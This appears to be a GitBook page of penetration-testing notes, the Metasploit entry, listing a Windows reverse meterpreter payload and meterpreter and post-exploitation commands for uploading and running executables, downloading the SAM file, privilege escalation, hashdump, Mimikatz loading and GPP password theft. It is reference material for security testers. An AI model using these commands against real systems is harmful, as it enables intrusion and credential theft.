Infrastructure penetration testing notes
  • Initial page
  • Table Of Content
  • Infrastructure testing
    • Enumeration
      • Packet Capture
      • Host Discovery
      • Services / Ports
        • 21 - FTP
        • 22 - SSH
        • 25 - SMTP
        • 53 - DNS
        • 67 - DHCP
        • 69 - TFTP
        • 79 - Finger
        • 88 - Kerberos
        • 111 - RPC
        • 113 - ident
        • 135 - MSRPC
        • 137 - Netbios
        • 139/445 - SMB
        • 161 - SNMP
        • 177 - XDMCP
        • 363 - LDAP
        • 443 - HTTPS
        • 500 - IKE (IPSEC)
        • 512/513/514 - R Services
        • 623 - IPMI
        • 873 - RSYNC
        • 1099 - Java RMI
        • 1433 - Microsoft SQL
        • 1521 - Oracle DB
        • 2049 - NFS
        • 3306 - MySQL
        • 3389 - RDP
        • 5432 - PostgresSQL
        • 5900 - VNC
        • 5985 - WinRM
        • 6000 - X11
        • 6379 - Redis
        • 8080 - Jenkins
        • 11211 - Memcached
        • RDS
        • SQLite
        • Docker
      • IPV6
        • Scanning
        • Enumeration
        • Transfering files
        • Pivoting and routes
        • THC IPv6
    • Gaining Access
      • IP Forwarding
      • VLAN Information
      • Psexec
      • Upgrading shell
      • Reverse Shells One-Liners
      • Bruteforce
      • MITM cleartext protocols
      • Null session
      • LLMNR / NBT NS Spoofing
      • Port knocking
      • Downloading/Transfer files
      • Remote Desktop
      • NAC Bypass
      • Pass-The-Hash
    • Exploitation
      • Solaris
      • IPv6
      • Windows
        • Compiling Code
        • SMB Vulnerabilities
        • Kerberos Attacks
    • Privilege Escalation
      • Situational Awareness
        • Linux
        • Windows
          • Registry
          • PowerView
          • FSMO Roles
      • Windows
        • Disable Apps and Firewall
        • Add user script
        • UAC Bypass
        • icacls
        • Running services
        • Common Exploits
      • Linux
        • SUID Shell script
        • CVE-2019-14287
        • Kernel exploit
      • Solaris
      • FreeBSD
      • Automated tools
      • Metasploit Modules
      • Password Dumping
    • Breakout
      • LOLBas
      • powershell constrained language byass
      • Alternatives to command prompt
      • Windows utilities
      • Applocker
      • Restricted shells
      • Environmental Variables / Bypassing Path Restrictions
      • Docker escape
      • Just Enough Administration (JEA)
    • Presistance
      • Windows
    • Pivoting
      • Adding routes
    • Password Cracking
      • Hashcat
      • John
      • Cisco Passwords
      • Passwords Lists
      • Generating wordlist
    • Tools
      • Nishang
      • UACME
      • Bypass-UAC
      • MSBuildAPICaller
      • Impacket
      • SharpPersist
      • Terminals
      • IP Calculation
      • pwsh
      • psTools / Sysinternals
      • Unlock applocker
      • enum4linux
      • Bloodhound
        • aclpwn
      • mitm6
      • Enyx
      • nfsshell
      • PowerUpSQL
      • Metasploit
        • msfvenom
    • Others
Powered by GitBook
On this page
  • Useful meterpreter commands.
  • Post Exploit Windows Metasploit Modules

Was this helpful?

  1. Infrastructure testing
  2. Tools

Metasploit

Windows reverse meterpreter payload

set payload windows/meterpreter/reverse_tcp

Useful meterpreter commands.

Command

Description

upload file c:\\windows

Meterpreter upload file to Windows target

download c:\\windows\\repair\\sam /tmp

Meterpreter download file from Windows target

download c:\\windows\\repair\\sam /tmp

Meterpreter download file from Windows target

execute -f c:\\windows\temp\exploit.exe

Meterpreter run .exe on target - handy for executing uploaded exploits

execute -f cmd -c

Creates new channel with cmd shell

ps

Meterpreter show processes

shell

Meterpreter get shell on the target

getsystem

Meterpreter attempts priviledge escalation the target

hashdump

Meterpreter attempts to dump the hashes on the target

portfwd add –l 3389 –p 3389 –r target

Meterpreter create port forward to target machine

portfwd delete –l 3389 –p 3389 –r target

Meterpreter delete port forward

Post Exploit Windows Metasploit Modules

Windows Metasploit Modules for privilege escalation.

Command

Description

run post/windows/gather/win_privs

Metasploit show privileges of current user

use post/windows/gather/credentials/gpp

Metasploit grab GPP saved passwords

load mimikatz -> wdigest

Metasploit load Mimikatz

run post/windows/gather/local_admin_search_enum

Identify other machines that the supplied domain user has administrative access to

run post/windows/gather/smart_hashdump

dump credentials

PreviousPowerUpSQLNextmsfvenom

Last updated 4 years ago

Was this helpful?